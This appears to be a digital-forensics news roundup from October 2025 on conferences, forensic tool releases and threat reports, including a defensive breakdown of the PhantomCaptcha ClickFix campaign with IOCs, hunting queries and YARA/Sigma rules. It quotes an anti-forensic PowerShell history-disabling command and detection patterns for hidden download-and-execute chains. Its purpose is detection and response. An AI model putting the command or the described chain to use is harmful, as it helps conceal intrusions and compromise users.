Techno Security & Digital Forensics Conference West 2025 kicks off in San Diego on October 27–29 at the Town & Country Resort, with a strong emphasis on Generative/Agentic AI discovery and legal impacts (event announcement, program highlights). Legal-oriented sessions are explicitly tackling discovery for GenAI and agentic AI, including JAMS’ panel “Artificial Intelligence and Generative AI: Causes of Action and Defenses and Discovery” scheduled for Monday, October 27 at 3:15 p.m. (JAMS session page). Regional partners also underline the AI-heavy tracks (Cybersecurity, eDiscovery, Forensics, Investigations) running October 27–29 (CCOE event listing).

MSAB’s Q3 2025 release introduces BruteStorm Surge, a GPU‑accelerated brute‑force add‑on for XRY Pro that targets long/complex passcodes, alongside major suite updates: XAMN 8.3 adds cross‑app conversation threading and support for Cash App warrant returns; UNIFY 25.9 can ingest Cellebrite UFDR and GrayKey extractions; and XEC 7.15 brings role‑based access control (RBAC). These capabilities are confirmed in MSAB’s official update and the initial news brief. See MSAB’s release post and feature breakdown (MSAB Q3 2025; Forensic Focus news).

Microsoft announced general availability of a unified Microsoft Defender for Identity sensor that correlates identity and endpoint telemetry across on‑premises Active Directory, Microsoft Entra ID, and even third‑party identity providers (e.g., Okta), improving incident correlation and enabling automatic attack disruption with richer identity context. The post also signals migration guidance for existing customers in the coming months. Microsoft Security Blog, 2025‑10‑23.

Why this matters to DFIR: identity evidence that used to be scattered (AD security events, Entra sign‑ins, endpoint logons) is now designed to land in one incident and one hunting surface (Defender XDR), with contain/disable actions tied directly to identity context. That reduces dwell time and speeds attribution and scoping. Microsoft Security Blog.

Forensic Focus’ Oct 22, 2025 roundup spotlights Microsoft’s new Digital Defense Report (MDDR) and a wave of DFIR-relevant updates. Microsoft reports that more than half of attacks with known motives are driven by extortion or ransomware, with 80% of investigated incidents targeting data theft for financial gain. Microsoft also processes ~100 trillion security signals daily, blocks ~4.5M new malware attempts, and analyzes 38M identity risk detections. Critically, over 97% of identity attacks are password attacks—and phishing‑resistant MFA can block >99% of them. (Forensic Focus roundup; Microsoft On the Issues article; MDDR 2025 overview). (forensicfocus.com)

ESET documented a late‑March through mid‑2025 surge of Operation DreamJob activity attributed to North Korea–aligned Lazarus, targeting multiple European defense companies — including firms that build UAV components and UAV software — to steal proprietary designs and manufacturing know‑how. Initial access relied on classic “dream job” lures and trojanized readers/loaders; later stages delivered ScoringMathTea, a Lazarus RAT with ~40 commands. ESET links the focus on UAV know‑how to North Korea’s push to scale its domestic drone program. (ESET WeLiveSecurity). (welivesecurity.com)

SANS Internet Storm Center’s Oct 24, 2025 Stormcast flags four items that should immediately shape triage and detection content across enterprise environments: an Android infostealer abusing Termux, active exploitation of Adobe Commerce/Magento “SessionReaper,” new cache-poisoning fixes for BIND and Unbound resolvers, and a released exploit for a critical WSUS deserialization RCE. Reference the minimal Stormcast entry and the full podcast summary for context (ISC diary 32418, podcast detail).

Below is a forensics-first breakdown: what to collect, where to hunt, and how to contain.

Cisco Talos IR’s Q3 2025 report highlights a sharp rise in compromises that began with exploitation of on‑premises Microsoft SharePoint via the ToolShell chain. More than 60% of Talos engagements involved exploitation of public‑facing apps, and almost 40% showed ToolShell activity; ransomware dropped to ~20% of cases while post‑exploitation phishing from compromised accounts continued to climb (Talos IR Q3 2025). Microsoft confirms active, multi‑actor abuse of new SharePoint bugs (CVE‑2025‑53770, CVE‑2025‑53771) related to earlier July CVEs (CVE‑2025‑49704, CVE‑2025‑49706), and stresses that only on‑prem servers are affected—not SharePoint Online (Microsoft Security TI, MSRC customer guidance). CISA added CVE‑2025‑53770 to the KEV catalog, underscoring exploitation in the wild (CISA KEV entry).

On October 22, 2025, SentinelLabs documented a one‑day spearphishing operation dubbed “PhantomCaptcha” that targeted Ukraine-linked NGOs and regional government staff. The chain blends a fake Cloudflare CAPTCHA with a ClickFix/Paste‑and‑Run prompt that executes staged PowerShell, culminating in a WebSocket-based RAT using JSON tasking. The campaign’s notable indicators include lure domain zoomconference[.]app, backend C2 bsnowcommunications[.]com, an embedded XOR key, and explicit attempts to suppress PowerShell history. (SentinelLabs report). (sentinelone.com)

Why it matters to DFIR

• It’s a social-engineering-heavy initial access where users self-execute the payload (ClickFix), bypassing file-centric controls. (Proofpoint background on ClickFix/Paste‑and‑Run). (proofpoint.com)
• Final C2 uses WebSocket over a web origin, complicating traditional proxy/IDS heuristics and blending under ATT&CK T1071.001 Web Protocols. (MITRE ATT&CK T1071; PT Security’s ATT&CK mirror noting WebSocket under web traffic). (attack.mitre.org)
• The actor disables PSReadLine’s history file, degrading a common host artifact unless you’ve instrumented Script Block/Module logging and/or transcription. (Set‑PSReadLineOption HistorySaveStyle; Mandiant/Google on PowerShell logging EIDs). (jdocs.mdbgo.io)

Attack chain (condensed)

1. Spearphishing email with a PDF that links to zoomconference[.]app, presenting a fake Cloudflare challenge. Clicking leads to a popup instructing “Copy token” then Win+R paste to run. (SentinelLabs; ATT&CK T1566.001/002). (sentinelone.com)
2. The button places a command on clipboard that launches PowerShell headlessly via conhost.exe, fetching a stage from /cptch/${clientId}. (SentinelLabs). (sentinelone.com)
3. Stage 1: large obfuscated PowerShell “cptch” downloader; core behavior = fetch next stage. Stage 2: “maintenance” collects host identifiers, XOR‑encodes with a hardcoded key, disables PSReadLine history, and retrieves Stage 3. Stage 3: a PowerShell RAT maintaining a WebSocket connection to bsnowcommunications[.]com, exchanging Base64‑encoded JSON tasks with keys like “cmd” and “psh”. (SentinelLabs). (sentinelone.com)

Artifacts you can pull today

• Email and doc lure
  • PDF SHA‑256: e8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3; link to zoomconference[.]app. (SentinelLabs). (sentinelone.com)
  • ATT&CK mapping: T1566.001 Spearphishing Attachment; T1566.002 Spearphishing Link. (ATT&CK; ATT&CK). (attack.mitre.org)
• Staging and payloads
  • Stage 1 “cptch” downloader SHA‑256: 3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44. (SentinelLabs). (sentinelone.com)
  • Stage 2 “maintenance” SHA‑256: 4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566; XOR key: b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l; disables history via Set‑PSReadLineOption -HistorySaveStyle SaveNothing. (SentinelLabs; Set‑PSReadLineOption docs). (sentinelone.com)
  • Stage 3 RAT SHA‑256: 19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23; WebSocket C2: wss://bsnowcommunications[.]com:80; JSON tasking keys: cmd, psh. (SentinelLabs). (sentinelone.com)
• Infrastructure
  • Lure: zoomconference[.]app → 193.233.23[.]81 (KVMKA hosting); backend C2: bsnowcommunications[.]com → 185.142.33[.]131. (SentinelLabs). (sentinelone.com)
• Local host artifacts (Windows)
  • PSReadLine history file (if not suppressed): %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. (artefacts.help reference). (artefacts.help)
  • PSReadLine option state: (Get-PSReadLineOption).HistorySaveStyle and HistorySavePath values (PowerShell 5.1+). (Microsoft Learn Get‑PSReadLineOption). (learn.microsoft.com)

Detection and hunting tips

• Process execution
  • Look for conhost.exe spawning powershell.exe with headless/hidden flags and an inline DownloadString/Invoke-Expression sequence.

// MDE: conhost -> powershell chain with clipboard-style payloads
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "conhost.exe"
| where FileName in~ ("powershell.exe","pwsh.exe")
| where ProcessCommandLine has_any ("DownloadString","Invoke-Expression","-WindowStyle Hidden","-NoProfile")

• Detect Set‑PSReadLineOption disabling history. If Script Block Logging is on, Event ID 4104 will capture the scriptblock text; Module logging produces 4103. (Mandiant/Google; Windows PowerShell Script Block Logging policy). (cloud.google.com)

// MDE: script block contains SaveNothing
DeviceEvents
| where Timestamp > ago(7d)
| where ActionType == "PowerShellScriptBlockLogging"
| where AdditionalFields contains "Set-PSReadLineOption" and AdditionalFields contains "SaveNothing"

• Network and WebSocket
  • Alert on outbound WebSocket (ws/wss) to non-standard ports or rare FQDNs; flag bsnowcommunications[.]com and wss to TCP/80 in particular. Map to ATT&CK T1071.001. (ATT&CK; PT Security ATT&CK mirror noting WebSocket). (attack.mitre.org)

// MDE: rare WebSocket to suspicious infra
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "bsnowcommunications.com" or (RemotePort == 80 and RemoteUrl endswith "/" and Protocol == "Tls")
| summarize dcount(DeviceId), make_set(RemoteUrl), make_set(InitiatingProcessFileName) by bin(Timestamp, 1h)

• File/host IOCs
  • Hunt for SHA‑256s listed above; validate downloads from /cptch/* and /maintenance endpoints where recorded by proxies. (SentinelLabs). (sentinelone.com)

Forensic workflow guidance

1. Scope and preserve
   • Acquire full disk and volatile memory on suspected workstations that accessed zoomconference[.]app on October 8–9, 2025; preserve enterprise proxy logs for those dates. (SentinelLabs timeline). (sentinelone.com)
2. PowerShell evidence
   • Even if HistorySaveStyle was set to SaveNothing, Script Block Logging (EID 4104) and Module Logging (EID 4103) can retain code bodies and pipeline details when properly configured. Consider enabling transcription to a write‑only share for future incidents. (Mandiant/Google; Windows policy references). (cloud.google.com)
   • Default PSReadLine history file location (if not disabled): %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. (artefacts.help). (artefacts.help)
3. Network corroboration
   • Identify any wss:// traffic to bsnowcommunications[.]com:80 and requests to /cptch/* or /maintenance. Treat any Base64 JSON payloads with keys cmd/psh as high‑fidelity if decrypted/inspected. (SentinelLabs). (sentinelone.com)
4. Memory analysis
   • Inspect PowerShell runspaces and loaded scriptblocks in memory; look for WebSocket client usage and repeated reconnect loops consistent with a RAT.

Quick content matches (YARA/Sigma-style examples)

• YARA (Stage 2 XOR key string)

rule PhantomCaptcha_Stage2_XORKey
{
  meta:
    author = "DFIR"
    description = "Match Stage2 XOR key from PhantomCaptcha"
  strings:
    $k = "b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l" ascii
  condition:
    $k
}

• Sigma-ish command-line pattern (conceptual)

logsource:
  category: process_creation
  product: windows
selection:
  image|endswith: '\\conhost.exe'
  parent_image|endswith: '\\powershell.exe'
  commandline|contains|all:
    - 'DownloadString'
    - 'Invoke-Expression'
    - '-WindowStyle Hidden'
condition: selection
level: medium

Hardening and response actions

• Block and monitor
  • Add bsnowcommunications[.]com and zoomconference[.]app to blocklists; monitor for any new lookalike registrations such as zoomconference[.]click reported post‑takedown activity. (SentinelLabs). (sentinelone.com)
  • Alert on ws/wss traffic from endpoints where browsers are not expected to initiate persistent sockets outside sanctioned apps; prioritize non‑443 use. Map to ATT&CK T1071.001. (ATT&CK). (attack.mitre.org)
• PowerShell logging baseline
  • Enable Script Block Logging and Module Logging via GPO/MDM; consider Transcription to a central write‑only share. (Windows policy CSP; Mandiant/Google guidance). (learn.microsoft.com)
• User comms and controls
  • Educate users on “copy this token and paste into Run/PowerShell” lures; they are a current trend. (Proofpoint ClickFix analysis). (proofpoint.com)

Indicators (from reporting)

• Domains: zoomconference[.]app, bsnowcommunications[.]com. IPs: 193.233.23[.]81, 185.142.33[.]131. Paths: /cptch/${clientId}, /maintenance. Payload hashes provided above. (SentinelLabs). (sentinelone.com)

Takeaways

• Turn on PowerShell Script Block + Module Logging and consider Transcription now; create alerts for Set‑PSReadLineOption → SaveNothing.
• Hunt for conhost.exe → powershell.exe chains with DownloadString/Invoke‑Expression and hidden window flags.
• Monitor/deny outbound WebSocket C2 to unknown domains and non‑standard ports; watch for bsnowcommunications[.]com and successors.
• Pull enterprise proxy logs for October 8–9, 2025 to scope access to zoomconference[.]app and related pivots; acquire memory on suspected hosts.
• Push user messaging: never paste “tokens” into Run/PowerShell from web prompts; report such prompts immediately. (Proofpoint ClickFix). (proofpoint.com)

Cisco Talos Incident Response reports that over 60% of their Q3 2025 engagements began with exploitation of public‑facing applications, driven largely by the ToolShell attack chain against on‑premises Microsoft SharePoint; roughly 40% of all engagements involved ToolShell activity. Talos also saw more post‑compromise phishing launched from valid internal accounts and a marked emphasis on segmentation and rapid eviction to contain spread. Ransomware made up about 20% of cases, with actors observed deploying a SharePoint webshell (notably spinstall0.aspx) and, in at least one case, abusing Velociraptor for persistence. Talos IR Q3 2025.

Elastic Security Labs documents an intrusion cluster (REF3927) abusing publicly disclosed ASP.NET machine keys to sign malicious ViewState and achieve in‑process code execution on IIS, then dropping an IIS module dubbed TOLLBOOTH for monetization/persistence and layering in a modified “Hidden” rootkit and off‑the‑shelf tools like Godzilla and GotoHTTP. Elastic report. (elastic.co)

Microsoft independently warned earlier in 2025 that over 3,000 machine keys had been found in public repos and documentation, and that threat actors were already using these to perform ViewState code injection leading to Godzilla deployment. Microsoft Security Blog. (microsoft.com)